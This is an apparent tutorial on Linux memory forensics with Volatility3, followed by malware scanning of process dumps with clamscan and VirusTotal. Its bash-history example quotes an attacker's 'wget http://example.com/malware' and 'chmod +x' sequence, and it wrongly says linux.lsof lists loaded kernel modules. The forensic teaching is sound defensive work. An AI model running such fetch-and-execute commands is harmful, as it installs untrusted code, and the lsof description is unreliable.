The quintessential tool for delving into the depths of Linux memory images. This journey through data unravels mysteries hidden within processes, potential malware footprints, and more.
Discovering the Essence of Volatility3
Volatility3, crafted by the Volatility Foundation, stands as a beacon in the world of digital forensics. It’s an open-source framework designed for analyzing volatile memory, offering a glimpse into the live state of systems.
Who’s Behind This Powerful Tool?
The Volatility Foundation, a team of passionate forensic and security experts, developed this tool. They’ve crafted Volatility3 as an advanced memory forensics framework, evolving from its predecessor, Volatility2.
Unveiling Linux Memory Secrets
With Volatility3, the once opaque realm of Linux memory becomes an open book. This powerful tool can uncover:
- Running Processes: Detecting hidden or unauthorized processes that may indicate system compromise.
- Network Activities: Revealing active connections, possibly tracing back to malicious communication.
- Command Histories: Exposing executed commands, including those left by potential attackers.
- Loaded Kernel Modules: Identifying kernel-level anomalies or rootkits.
Real-World Applications
- Incident Response: Quickly identify indicators of compromise in a breached Linux system.
- Malware Analysis: Dissect malware behavior and its impact on a system.
- Digital Forensics: Gather crucial evidence for legal and cybersecurity investigations.
Examples:
- Command:
python3 vol.py -f memory.vmem linux.pslist– Lists processes like sshd (PID 1224), bash (PID 1789). - Command:
python3 vol.py -f memory.vmem linux.pstree– Shows systemd (PID 1) as a parent of sshd (PID 1224). - Command:
python3 vol.py -f memory.vmem linux.bash– Reveals commands like wget http://example.com/malware, chmod +x malware. - Hypothetical Command:
python3 vol.py -f memory.vmem linux.netconnections– Might display connections to suspicious IP addresses on unusual ports. - Command:
python3 vol.py -f memory.vmem linux.proc_dump --pid 1224 --dump-dir /path/to/dump– Dumps the memory of the process with PID 1224. - Command:
python3 vol.py -f memory.vmem linux.pslist | awk '{print $3}' | xargs -I {} python3 vol.py -f memory.vmem linux.proc_dump --pid {} --dump-dir /path/to/dump– Dumps the memory of all processes. - Command:
python3 vol.py -f memory.vmem linux.lsof– Lists loaded modules like tcp_diag, udp_diag. - Command:
python3 vol.py -f memory.vmem linux.environ– Displays environment variables of processes. - Command:
python3 vol.py -f memory.vmem linux.cmdline– Shows command-line arguments for each process.
In the dynamic and often murky waters of digital forensics, Volatility3 serves as a guiding light, offering clarity and insight into the complex world of Linux memory analysis.
Scanning Memory Dumps for Malware with Clamscan
After meticulously using Volatility3 to dump the processes from a Linux memory image, the next pivotal step is to scrutinize these dumps for malware. This is where clamscan, a versatile malware scanner, plays its crucial role.
Why Scan Memory Dumps?
Post-process dumping, these files become fertile ground for malware hunting. Malware often resides in process memory, evading standard file-based detection. Scanning these dumps with clamscan is akin to shining a light on hidden threats, revealing malware that might otherwise go unnoticed.
Clamscan in Action: Unearthing Hidden Malware
- Syntax:
clamscan -r /path/to/dump - What it does: Recursively scans the directory containing dumped processes for any signs of malware.
- Example Output: Alerts for any detected malware signatures, pinpointing the exact file and location.
Analyzing Memory Dumps with VirusTotal
Following the local analysis with Clamscan, uploading the memory dump files to VirusTotal offers an additional layer of scrutiny. VirusTotal, a sophisticated online tool, cross-references files against multiple antivirus engines and databases, providing a comprehensive malware detection spectrum.
Enhancing Detection with VirusTotal
By leveraging the collective intelligence of VirusTotal’s extensive database, you can uncover even the most elusive malware signatures in the memory dumps.
Process for Uploading to VirusTotal
- Navigate to VirusTotal.
- Choose the memory dump file you wish to analyze.
- Upload the file for an in-depth scan against myriad malware detection engines.
- Review the detailed report provided post-analysis for any potential threats.
By integrating antivirus options like clamscan or virus total into your forensic workflow, you elevate the malware detection process, seamlessly bridging the gap between memory analysis and malware identification. This technique enhances the overall efficacy of your digital forensic investigations.
Resource
CSI Linux Certified Computer Forensic Investigator | CSI Linux Academy